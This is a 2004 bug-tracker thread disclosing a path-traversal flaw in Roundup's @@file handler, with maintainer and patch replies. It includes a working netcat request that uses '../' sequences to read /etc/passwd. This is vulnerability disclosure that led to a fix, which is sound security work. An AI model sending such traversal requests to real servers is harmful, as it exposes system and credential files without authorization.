roundUP.txt

`Vickenty Fesunov   
2004-05-27 04:51  
  
random filesystem access  
  
Roundup uses /home/@@file/ prefix to get static files  
from the filesystem. It does not restrict in any way  
the files that are handled.  
  
I have a roundup tracker home at /home/kent/cit, then I  
do the following:  
  
kent@kent:~$ nc localhost 8080  
GET /cit/@@file/../../../../etc/passwd HTTP/1.0  
Host: kent  
  
HTTP/1.0 200 OK  
Server: BaseHTTP/0.3 Python/2.3.3  
Date: Thu, 27 May 2004 11:47:04 GMT  
Last-Modifed: Tue, 18 May 2004 14:00:15 GMT  
Content-Length: 1088  
Content-Type: text/plain  
Pragma: no-cache  
  
and my actual /etc/passwd follows.  
  
Perhaps roundup web interface should restrict @@file  
requests to some directory.  
  
------------------------------------------------------------------------  
  
Date: 2004-05-27 14:48  
Sender: richard </users/richard/>  
Logged In: YES   
user_id=6405  
  
Fixed, and I'll put up new releases for 0.6 and 0.7 ASAP.   
  
Thanks for the report.   
  
------------------------------------------------------------------------  
  
Date: 2004-05-27 09:18  
Sender: kent_turbo </users/kent_turbo/>  
Logged In: YES   
user_id=714555  
  
I have attached a patch that fixes this bug. It uses  
os.path.normpath to normalise the path, and then checks that  
the file to be served resides under STATIC_FILES (new  
variable in the config) path. config.py in the templates are  
patched to include this new variable.  
  
------------------------------------------------------------------------  
  
Date: 2004-05-27 08:41  
Sender: kent_turbo </users/kent_turbo/>  
Logged In: YES   
user_id=714555  
  
I have attached a patch that fixes this bug. It uses  
os.path.normpath to normalise the path, and then checks that  
the file to be served resides under STATIC_FILES (new  
variable in the config) path. config.py in the templates are  
patched to include this new variable.  
`